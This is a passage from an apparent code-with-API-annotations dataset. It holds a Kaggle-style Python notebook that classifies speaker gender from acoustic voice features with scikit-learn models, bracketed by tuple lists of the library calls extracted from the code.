'serializers.CharField', ([], {}), '()\n', (3037, 3039), True, 'import rest_framework.serializers as serializers\n'), ((3050, 3072), 'rest_framework.serializers.URLField', 'serializers.URLField', ([], {}), '()\n', (3070, 3072), True, 'import rest_framework.serializers as serializers\n'), ((3088, 3115), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3113, 3115), True, 'import rest_framework.serializers as serializers\n'), ((3130, 3157), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3155, 3157), True, 'import rest_framework.serializers as serializers\n'), ((3177, 3204), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3202, 3204), True, 'import rest_framework.serializers as serializers\n'), ((3222, 3249), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3247, 3249), True, 'import rest_framework.serializers as serializers\n'), ((3271, 3298), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3296, 3298), True, 'import rest_framework.serializers as serializers\n'), ((3318, 3345), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3343, 3345), True, 'import rest_framework.serializers as serializers\n'), ((3367, 3394), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (3392, 3394), True, 'import rest_framework.serializers as serializers\n'), ((3527, 3550), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (3548, 3550), True, 'import rest_framework.serializers as serializers\n'), ((3684, 3707), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (3705, 3707), True, 'import rest_framework.serializers as serializers\n'), ((3830, 3865), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {'default': 'dict'}), '(default=dict)\n', (3851, 3865), True, 'import rest_framework.serializers as serializers\n'), ((3882, 3939), 'rest_framework.serializers.StringRelatedField', 'serializers.StringRelatedField', ([], {'many': '(True)', 'read_only': '(True)'}), '(many=True, read_only=True)\n', (3912, 3939), True, 'import rest_framework.serializers as serializers\n'), ((4293, 4316), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (4314, 4316), True, 'import rest_framework.serializers as serializers\n'), ((4333, 4356), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (4354, 4356), True, 'import rest_framework.serializers as serializers\n'), ((4373, 4399), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (4397, 4399), True, 'import rest_framework.serializers as serializers\n'), ((4442, 4465), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (4463, 4465), True, 'import rest_framework.serializers as serializers\n'), ((4483, 4509), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (4507, 4509), True, 'import rest_framework.serializers as serializers\n'), ((4520, 4542), 'rest_framework.serializers.URLField', 'serializers.URLField', ([], {}), '()\n', (4540, 4542), True, 'import rest_framework.serializers as serializers\n'), ((4558, 4585), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4583, 4585), True, 'import rest_framework.serializers as serializers\n'), ((4600, 4627), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4625, 4627), True, 'import rest_framework.serializers as serializers\n'), ((4647, 4674), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4672, 4674), True, 'import rest_framework.serializers as serializers\n'), ((4692, 4719), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4717, 4719), True, 'import rest_framework.serializers as serializers\n'), ((4741, 4768), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4766, 4768), True, 'import rest_framework.serializers as serializers\n'), ((4788, 4815), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4813, 4815), True, 'import rest_framework.serializers as serializers\n'), ((4836, 4863), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (4861, 4863), True, 'import rest_framework.serializers as serializers\n'), ((4985, 5042), 'rest_framework.serializers.StringRelatedField', 'serializers.StringRelatedField', ([], {'many': '(True)', 'read_only': '(True)'}), '(many=True, read_only=True)\n', (5015, 5042), True, 'import rest_framework.serializers as serializers\n'), ((5059, 5084), 'job.serializers.JobTypeBaseSerializerV6', 'JobTypeBaseSerializerV6', ([], {}), '()\n', (5082, 5084), False, 'from job.serializers import JobTypeBaseSerializerV6\n'), ((5095, 5114), 'util.rest.ModelIdSerializer', 'ModelIdSerializer', ([], {}), '()\n', (5112, 5114), False, 'from util.rest import ModelIdSerializer\n'), ((5129, 5148), 'util.rest.ModelIdSerializer', 'ModelIdSerializer', ([], {}), '()\n', (5146, 5148), False, 'from util.rest import ModelIdSerializer\n'), ((5166, 5189), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (5187, 5189), True, 'import rest_framework.serializers as serializers\n'), ((5209, 5237), 'recipe.serializers.RecipeTypeBaseSerializerV6', 'RecipeTypeBaseSerializerV6', ([], {}), '()\n', (5235, 5237), False, 'from recipe.serializers import RecipeTypeBaseSerializerV6\n'), ((5251, 5270), 'util.rest.ModelIdSerializer', 'ModelIdSerializer', ([], {}), '()\n', (5268, 5270), False, 'from util.rest import ModelIdSerializer\n'), ((5289, 5312), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (5310, 5312), True, 'import rest_framework.serializers as serializers\n'), ((5325, 5348), 'batch.serializers.BatchBaseSerializerV6', 'BatchBaseSerializerV6', ([], {}), '()\n', (5346, 5348), False, 'from batch.serializers import BatchBaseSerializerV6\n'), ((5370, 5396), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (5394, 5396), True, 'import rest_framework.serializers as serializers\n'), ((5414, 5441), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (5439, 5441), True, 'import rest_framework.serializers as serializers\n'), ((5576, 5611), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {'default': 'dict'}), '(default=dict)\n', (5597, 5611), True, 'import rest_framework.serializers as serializers\n')] |
#!/usr/bin/env python
# coding: utf-8
# # Gender Recognition by Voice Kaggle [ Test Accuracy : 99.08 % ]
# In[ ]:
# ## CONTENTS::
# [ **1 ) Importing Various Modules and Loading the Dataset**](#content1)
# [ **2 ) Exploratory Data Analysis (EDA)**](#content2)
# [ **3 ) OutlierTreatment**](#content3)
# [ **4 ) Feature Engineering**](#content4)
# [ **5 ) Preparing the Data**](#content5)
# [ **6 ) Modelling**](#content6)
# [ **7 ) Parameter Tuning with GridSearchCV**](#content7)
# In[ ]:
# ## 1.1 ) Importing Various Modules
# In[ ]:
# Ignore the warnings
import warnings
warnings.filterwarnings('always')
warnings.filterwarnings('ignore')
# data visualisation and manipulation
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
import seaborn as sns
import missingno as msno
#configure
# sets matplotlib to inline and displays graphs below the corressponding cell.
style.use('fivethirtyeight')
sns.set(style='whitegrid',color_codes=True)
#import the necessary modelling algos.
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import datasets
from sklearn.naive_bayes import GaussianNB
#model selection
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.metrics import accuracy_score,precision_score,recall_score,confusion_matrix,roc_curve,roc_auc_score
from sklearn.model_selection import GridSearchCV
#preprocess.
from sklearn.preprocessing import MinMaxScaler,StandardScaler,Imputer,LabelEncoder,OneHotEncoder
# ## 1.2 ) Loading the Dataset
# In[ ]:
train=pd.read_csv(r"../../../input/primaryobjects_voicegender/voice.csv")
# In[ ]:
train.head(10)
# <a id="content2"></a>
# ## 2 ) Exploratory Data Analysis (EDA)
# ## 2.1 ) The Features and the 'Target' variable
# In[ ]:
df=train.copy()
# In[ ]:
df.head(10)
# In[ ]:
df.shape
# In[ ]:
df.index
# In[ ]:
df.columns # give a short description of each feature.
# **#A short description as on 'Data' tab on kaggle is :**
# ####
#
# **meanfreq**: mean frequency (in kHz)
#
# **sd**: standard deviation of frequency
#
# **median**: median frequency (in kHz)
#
# **Q25**: first quantile (in kHz)
#
# **Q75**: third quantile (in kHz)
#
# **IQR**: interquantile range (in kHz)
#
# **skew**: skewness (see note in specprop description)
#
# **kurt**: kurtosis (see note in specprop description)
#
# **sp.ent**: spectral entropy
#
# **sfm**: spectral flatness
#
# **mode**: mode frequency
#
# **centroid**: frequency centroid (see specprop)
#
# **peakf**: peak frequency (frequency with highest energy)
#
# **meanfun**: average of fundamental frequency measured across acoustic signal
#
# **minfun**: minimum fundamental frequency measured across acoustic signal
#
# **maxfun**: maximum fundamental frequency measured across acoustic signal
#
# **meandom**: average of dominant frequency measured across acoustic signal
#
# **mindom**: minimum of dominant frequency measured across acoustic signal
#
# **maxdom**: maximum of dominant frequency measured across acoustic signal
#
# **dfrange**: range of dominant frequency measured across acoustic signal
#
# **modindx**: modulation index. Calculated as the accumulated absolute difference between adjacent measurements of fundamental frequencies divided by the frequency range
#
# **label**: male or female
# #### Note that we have 3168 voice samples and for each of sample 20 different acoustic properties are recorded. Finally the 'label' column is the target variable which we have to predict which is the gender of the person.
# ## 2.2 ) Missing Values Treatment
# In[ ]:
# check for null values.
df.isnull().any()
# In[ ]:
msno.matrix(df) # just to visualize. no missing value.
# ## 2.3 ) Univariate Analysis
# In this section I have performed the univariate analysis. Note that since all of the features are 'numeric' the most reasonable way to plot them would either be a 'histogram' or a 'boxplot'.
#
# Also note that univariate analysis is useful for outlier detection. Hence besides plotting a boxplot and a histogram for each column or feature, I have written a small utility function which tells the remaining no of observations for each feature if we remove its outliers.
# #### To detect the outliers I have used the standard 1.5 InterQuartileRange (IQR) rule which states that any observation lesser than 'first quartile - 1.5 IQR' or greater than 'third quartile +1.5 IQR' is an outlier.
# In[ ]:
df.describe()
# In[ ]:
def calc_limits(feature):
q1,q3=df[feature].quantile([0.25,0.75])
iqr=q3-q1
rang=1.5*iqr
return(q1-rang,q3+rang)
# In[ ]:
def plot(feature):
fig,axes=plt.subplots(1,2)
sns.boxplot(data=df,x=feature,ax=axes[0])
sns.distplot(a=df[feature],ax=axes[1],color='#ff4125')
fig.set_size_inches(15,5)
lower,upper = calc_limits(feature)
l=[df[feature] for i in df[feature] if i>lower and i<upper]
print("Number of data points remaining if outliers removed : ",len(l))
# In[ ]:
plot('meanfreq')
# #### INFERENCES FROM THE PLOT--
#
# 1) First of all note that the values are in compliance with that observed from describe method data frame..
#
# 2) Note that we have a couple of outliers w.r.t. to 1.5 quartile rule (reprsented by a 'dot' in the box plot).Removing these data points or outliers leaves us with around 3104 values.
#
# 3) Also note from the distplot that the distribution seems to be a bit -ve skewed hence we can normalize to make the distribution a bit more symmetric.
#
# 4) LASTLY NOTE THAT A LEFT TAIL DISTRIBUTION HAS MORE OUTLIERS ON THE SIDE BELOW TO Q1 AS EXPECTED AND A RIGHT TAIL HAS ABOVE THE Q3.
# #### Similar other plots can be inferenced.
# In[ ]:
plot('sd')
# In[ ]:
plot('median')
# In[ ]:
plot('Q25')
# In[ ]:
plot('IQR')
# In[ ]:
plot('skew')
# In[ ]:
plot('kurt')
# In[ ]:
plot('sp.ent')
# In[ ]:
plot('sfm')
# In[ ]:
plot('meanfun')
# In[ ]:
sns.countplot(data=df,x='label')
# In[ ]:
df['label'].value_counts()
# #### Note that we have equal no of observations for the 'males' and the 'females'. Hence it is a balanced class problem.
# ## 2.4 ) Bivariate Analysis
# ## 2.4.1 ) Corealtion b/w Features
# In this section I have analyzed the corelation between different features. To do it I have plotted a 'heat map' which clearly visulizes the corelation between different features.
# In[ ]:
temp = []
for i in df.label:
if i == 'male':
temp.append(1)
else:
temp.append(0)
df['label'] = temp
# In[ ]:
#corelation matrix.
cor_mat= df[:].corr()
mask = np.array(cor_mat)
mask[np.tril_indices_from(mask)] = False
fig=plt.gcf()
fig.set_size_inches(30,12)
# #### SOME INFERENCES FROM THE ABOVE HEATMAP--
#
# 1) Mean frequency is moderately related to label.
#
# 2) IQR and label tend to have a strong positive corelation.
#
# 3) Spectral entropy is also quite highly corelated with the label while sfm is moderately related with label.
#
# 4) skewness and kurtosis aren't much related with label.
#
# 5) meanfun is highly negatively corelated with the label.
#
# 6) Centroid and median have a high positive corelationas expected from their formulae.
#
# 7) ALSO NOTE THAT MEANFREQ AND CENTROID ARE EXACTLY SAME FEATURES AS PER FORMULAE AND VALUES ALSO. HENCE THEIR CORELATION IS PERFCET 1. IN THAT CASE WE CAN DROP ANY COLUMN. note that centroid in general has a high degree of corelation with most of the other features.
#
# SO I WILL DROP THE 'CENTROID' COLUMN.
#
# 8) sd is highly positively related to sfm and so is sp.ent to sd.
#
# 9) kurt and skew are also highly corelated.
#
# 10) meanfreq is highly related to medaina s well as Q25.
#
# 11) IQR is highly corelated to sd.
#
# 12) Finally self relation ie of a feature to itself is equal to 1 as expected.
# #### Note that we can drop some highly corelated features as they add redundancy to the model but let us keep all the features for now. In case of highly corelated features we can use dimensionality reduction techniques like Principal Component Analysis(PCA) to reduce our feature space.
# In[ ]:
df.drop('centroid',axis=1,inplace=True)
# ## 2.4.2 ) Plotting the Features against the 'Target' variable
# Here I have just written a small utility function that plots the 'label' column vs the provided feature on a boxplot. In this way I have plotted some of the features against our target variable. This makes it easier to see the effect of the corressponding feature on the 'label'.
# In[ ]:
# drawing features against the target variable.
def plot_against_target(feature):
sns.factorplot(data=df,y=feature,x='label',kind='box')
fig=plt.gcf()
fig.set_size_inches(7,7)
# In[ ]:
plot_against_target('meanfreq') # 0 for females and 1 for males.
# #### INFERENCES--
#
# 1) Firstly note that 0->'female' and 1->'male'.
#
# 2) Note that the boxpot depicts that the females in genral have higher mean frequencies than their male counterparts and which is a generally accepted fact.
# #### Again similar inferences can be drawn.
# In[ ]:
plot_against_target('sd')
# In[ ]:
plot_against_target('median')
# In[ ]:
plot_against_target('Q25')
# In[ ]:
plot_against_target('IQR')
# #### Note here that there is a remarkable difference b/w the inter quartile ranges of males and females.This is evident from the strong relation between 'label' and the 'IQR' in the heatmap plotted above.
# In[ ]:
plot_against_target('sp.ent')
# In[ ]:
plot_against_target('sfm')
# In[ ]:
plot_against_target('meanfun')
# #### Again high difference in females and males mean fundamental frequency. This is evident from the heat map which clearly shows the high corelation between meanfun and the 'label'.
# In[ ]:
# #### Now we move onto analyzing different features pairwise. Since all the features are continuous the most reasonable way to do this is plotting the scatter plots for each feature pair. I have also distinguished males and feamles on the same plot which makes it a bit easier to compare the variation of features within the two classes.
# In[ ]:
g = sns.PairGrid(df[['meanfreq','sd','median','Q25','IQR','sp.ent','sfm','meanfun','label']], hue = "label")
g = g.map(plt.scatter).add_legend()
# In[ ]:
# <a id="content3"></a>
# ## 3 ) Outlier Treatment
# In this section I have dealt with the outliers. Note that we discovered the potential outliers in the **'univariate analysis' ** section. Now to remove those outliers we can either remove the corressponding data points or impute them with some other statistical quantity like median (robust to outliers) etc..
# #### For now I shall be removing all the observations or data points which are outlier to 'any' feature. Note that this substantially reduces the dataset size.
# In[ ]:
# removal of any data point which is an outlier for any fetaure.
for col in df.columns:
lower,upper=calc_limits(col)
df = df[(df[col] >lower) & (df[col]<upper)]
# In[ ]:
df.shape
# In[ ]:
df.head(10)
# <a id="content4"></a>
# ## 4 ) Feature Engineering.
# ## 4.1 ) Dropping the features
# I have dropped some columns which according to my analysis proved to be less useful or redundant.
# In[ ]:
temp_df=df.copy()
temp_df.drop(['skew','kurt','mindom','maxdom'],axis=1,inplace=True) # only one of maxdom and dfrange.
temp_df.head(10)
#df.head(10)
# ## 4.2 ) Creating new features
# I have done two new things. Firstly I have made 'meanfreq','median' and 'mode' to comply by the standard relation->
# #### ......................................................................................3*Median=2*Mean +Mode.........................................................................
# #### For this I have adjusted values in the 'median' column as shown below. You can alter values in any of the other column say the 'meanfreq' column.
# In[ ]:
temp_df['meanfreq']=temp_df['meanfreq'].apply(lambda x:x*2)
temp_df['median']=temp_df['meanfreq']+temp_df['mode']
temp_df['median']=temp_df['median'].apply(lambda x:x/3)
# In[ ]:
temp_df.head(10)
# In[ ]:
sns.boxplot(data=temp_df,y='median',x='label') # seeing the new 'median' against the 'label'.
# The second new feature that I have added is a new feature to mesure the 'skewness'.
# #### For this I have used the 'Karl Pearson Coefficent' which is calculated as shown below->
# **** ..........................................................Coefficent = (Mean - Mode )/StandardDeviation......................................................****
# **You can also try some other coefficient also and see how it comapres with the target i.e. the 'label' column.**
# In[ ]:
temp_df['pear_skew']=temp_df['meanfreq']-temp_df['mode']
temp_df['pear_skew']=temp_df['pear_skew']/temp_df['sd']
temp_df.head(10)
# In[ ]:
sns.boxplot(data=temp_df,y='pear_skew',x='label') # plotting new 'skewness' against the 'label'.
# <a id="content5"></a>
# ## 5 ) Preparing the Data
# ## 5.1 ) Normalizing the Features.
# In[ ]:
scaler=StandardScaler()
scaled_df=scaler.fit_transform(temp_df.drop('label',axis=1))
X=scaled_df
Y=df['label'].as_matrix()
# ## 5.2 ) Splitting into Training and Validation sets.
# In[ ]:
x_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.20,random_state=42)
# In[ ]:
# <a id="content6"></a>
# ## 6 ) Modelling
# #### LOGISTIC REGRESSSION
# In[ ]:
clf_lr=LogisticRegression()
clf_lr.fit(x_train,y_train)
pred=clf_lr.predict(x_test)
print(accuracy_score(pred,y_test))
# #### kNN
# In[ ]:
clf_knn=KNeighborsClassifier()
clf_knn.fit(x_train,y_train)
pred=clf_knn.predict(x_test)
print(accuracy_score(pred,y_test))
# #### Support Vector Machine (SVM)
# In[ ]:
clf_svm=SVC()
clf_svm.fit(x_train,y_train)
pred=clf_svm.predict(x_test)
print(accuracy_score(pred,y_test))
# #### DECISION TREE
# In[ ]:
clf_dt=DecisionTreeClassifier()
clf_dt.fit(x_train,y_train)
pred=clf_dt.predict(x_test)
print(accuracy_score(pred,y_test))
# #### RANDOM FOREST
# In[ ]:
clf_rf=RandomForestClassifier()
clf_rf.fit(x_train,y_train)
pred=clf_rf.predict(x_test)
print(accuracy_score(pred,y_test))
# #### GRADIENT BOOSTING
# In[ ]:
clf_gb=GradientBoostingClassifier()
clf_gb.fit(x_train,y_train)
pred=clf_gb.predict(x_test)
print(accuracy_score(pred,y_test))
# #### We can now move onto comparing the results of various modelling algorithms. for tthis I shall combine the results of all models in a data frame and then plot using a barplot .
# In[ ]:
models=[LogisticRegression(),LinearSVC(),SVC(kernel='rbf'),KNeighborsClassifier(),RandomForestClassifier(),DecisionTreeClassifier(),GradientBoostingClassifier(),GaussianNB()]
model_names=['LogisticRegression','LinearSVM','rbfSVM','KNearestNeighbors','RandomForestClassifier','DecisionTree','GradientBoostingClassifier','GaussianNB']
acc=[]
d={}
for model in range(len(models)):
clf=models[model]
clf.fit(x_train,y_train)
pred=clf.predict(x_test)
acc.append(accuracy_score(pred,y_test))
d={'Modelling Algo':model_names,'Accuracy':acc}
# In[ ]:
acc_frame=pd.DataFrame(d)
acc_frame
# In[ ]:
sns.barplot(y='Modelling Algo',x='Accuracy',data=acc_frame)
# In[ ]:
# <a id="content7"></a>
# ## 7 ) Parameter Tuning with GridSearchCV
# 1. I have tuned only SVM Similarly other algorithms can be tuned.
# In[ ]:
params_dict={'C':[0.001,0.01,0.1,1,10,100],'gamma':[0.001,0.01,0.1,1,10,100],'kernel':['linear','rbf']}
clf=GridSearchCV(estimator=SVC(),param_grid=params_dict,scoring='accuracy',cv=10)
clf.fit(x_train,y_train)
# In[ ]:
clf.best_score_
# In[ ]:
clf.best_params_
# In[ ]:
print(accuracy_score(clf.predict(x_test),y_test))
# In[ ]:
print(precision_score(clf.predict(x_test),y_test))
# ### The precision is almost 99.5 % which is quite high.
# ### After tuning SVM gives an amazing accuracy of around 99.1 %. Similarly tuning other algorithms parameters might give even greater accuracy !!!
# In[ ]:
# ## THE END!!!
# In[ ]:
| [
"pandas.read_csv",
"sklearn.neighbors.KNeighborsClassifier",
"missingno.matrix",
"numpy.array",
"matplotlib.style.use",
"seaborn.set",
"seaborn.distplot",
"sklearn.tree.DecisionTreeClassifier",
"pandas.DataFrame",
"numpy.tril_indices_from",
"sklearn.model_selection.train_test_split",
"matplotl... | [((600, 633), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""always"""'], {}), "('always')\n", (623, 633), False, 'import warnings\n'), ((634, 667), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (657, 667), False, 'import warnings\n'), ((945, 973), 'matplotlib.style.use', 'style.use', (['"""fivethirtyeight"""'], {}), "('fivethirtyeight')\n", (954, 973), False, 'from matplotlib import style\n'), ((974, 1018), 'seaborn.set', 'sns.set', ([], {'style': '"""whitegrid"""', 'color_codes': '(True)'}), "(style='whitegrid', color_codes=True)\n", (981, 1018), True, 'import seaborn as sns\n'), ((1888, 1954), 'pandas.read_csv', 'pd.read_csv', (['"""../../../input/primaryobjects_voicegender/voice.csv"""'], {}), "('../../../input/primaryobjects_voicegender/voice.csv')\n", (1899, 1954), True, 'import pandas as pd\n'), ((4017, 4032), 'missingno.matrix', 'msno.matrix', (['df'], {}), '(df)\n', (4028, 4032), True, 'import missingno as msno\n'), ((6314, 6347), 'seaborn.countplot', 'sns.countplot', ([], {'data': 'df', 'x': '"""label"""'}), "(data=df, x='label')\n", (6327, 6347), True, 'import seaborn as sns\n'), ((6963, 6980), 'numpy.array', 'np.array', (['cor_mat'], {}), '(cor_mat)\n', (6971, 6980), True, 'import numpy as np\n'), ((7026, 7035), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (7033, 7035), True, 'import matplotlib.pyplot as plt\n'), ((10504, 10618), 'seaborn.PairGrid', 'sns.PairGrid', (["df[['meanfreq', 'sd', 'median', 'Q25', 'IQR', 'sp.ent', 'sfm', 'meanfun',\n 'label']]"], {'hue': '"""label"""'}), "(df[['meanfreq', 'sd', 'median', 'Q25', 'IQR', 'sp.ent', 'sfm',\n 'meanfun', 'label']], hue='label')\n", (10516, 10618), True, 'import seaborn as sns\n'), ((12499, 12547), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'temp_df', 'y': '"""median"""', 'x': '"""label"""'}), "(data=temp_df, y='median', x='label')\n", (12510, 12547), True, 'import seaborn as sns\n'), ((13221, 13272), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'temp_df', 'y': '"""pear_skew"""', 'x': '"""label"""'}), "(data=temp_df, y='pear_skew', x='label')\n", (13232, 13272), True, 'import seaborn as sns\n'), ((13429, 13445), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (13443, 13445), False, 'from sklearn.preprocessing import MinMaxScaler, StandardScaler, Imputer, LabelEncoder, OneHotEncoder\n'), ((13645, 13699), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'Y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(X, Y, test_size=0.2, random_state=42)\n', (13661, 13699), False, 'from sklearn.model_selection import train_test_split\n'), ((13805, 13825), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (13823, 13825), False, 'from sklearn.linear_model import LogisticRegression\n'), ((13950, 13972), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (13970, 13972), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((14124, 14129), 'sklearn.svm.SVC', 'SVC', ([], {}), '()\n', (14127, 14129), False, 'from sklearn.svm import SVC\n'), ((14267, 14291), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (14289, 14291), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((14425, 14449), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {}), '()\n', (14447, 14449), False, 'from sklearn.ensemble import RandomForestClassifier\n'), ((14587, 14615), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ([], {}), '()\n', (14613, 14615), False, 'from sklearn.ensemble import GradientBoostingClassifier\n'), ((15486, 15501), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {}), '(d)\n', (15498, 15501), True, 'import pandas as pd\n'), ((15525, 15586), 'seaborn.barplot', 'sns.barplot', ([], {'y': '"""Modelling Algo"""', 'x': '"""Accuracy"""', 'data': 'acc_frame'}), "(y='Modelling Algo', x='Accuracy', data=acc_frame)\n", (15536, 15586), True, 'import seaborn as sns\n'), ((5014, 5032), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {}), '(1, 2)\n', (5026, 5032), True, 'import matplotlib.pyplot as plt\n'), ((5036, 5079), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'df', 'x': 'feature', 'ax': 'axes[0]'}), '(data=df, x=feature, ax=axes[0])\n', (5047, 5079), True, 'import seaborn as sns\n'), ((5082, 5138), 'seaborn.distplot', 'sns.distplot', ([], {'a': 'df[feature]', 'ax': 'axes[1]', 'color': '"""#ff4125"""'}), "(a=df[feature], ax=axes[1], color='#ff4125')\n", (5094, 5138), True, 'import seaborn as sns\n'), ((6986, 7012), 'numpy.tril_indices_from', 'np.tril_indices_from', (['mask'], {}), '(mask)\n', (7006, 7012), True, 'import numpy as np\n'), ((8984, 9041), 'seaborn.factorplot', 'sns.factorplot', ([], {'data': 'df', 'y': 'feature', 'x': '"""label"""', 'kind': '"""box"""'}), "(data=df, y=feature, x='label', kind='box')\n", (8998, 9041), True, 'import seaborn as sns\n'), ((9047, 9056), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (9054, 9056), True, 'import matplotlib.pyplot as plt\n'), ((13888, 13916), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (13902, 13916), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14037, 14065), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14051, 14065), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14194, 14222), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14208, 14222), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14354, 14382), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14368, 14382), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14512, 14540), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14526, 14540), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14678, 14706), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14692, 14706), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14913, 14933), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (14931, 14933), False, 'from sklearn.linear_model import LogisticRegression\n'), ((14934, 14945), 'sklearn.svm.LinearSVC', 'LinearSVC', ([], {}), '()\n', (14943, 14945), False, 'from sklearn.svm import LinearSVC\n'), ((14946, 14963), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (14949, 14963), False, 'from sklearn.svm import SVC\n'), ((14964, 14986), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (14984, 14986), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((14987, 15011), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {}), '()\n', (15009, 15011), False, 'from sklearn.ensemble import RandomForestClassifier\n'), ((15012, 15036), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (15034, 15036), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((15037, 15065), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ([], {}), '()\n', (15063, 15065), False, 'from sklearn.ensemble import GradientBoostingClassifier\n'), ((15066, 15078), 'sklearn.naive_bayes.GaussianNB', 'GaussianNB', ([], {}), '()\n', (15076, 15078), False, 'from sklearn.naive_bayes import GaussianNB\n'), ((15380, 15408), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (15394, 15408), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((15881, 15886), 'sklearn.svm.SVC', 'SVC', ([], {}), '()\n', (15884, 15886), False, 'from sklearn.svm import SVC\n')] |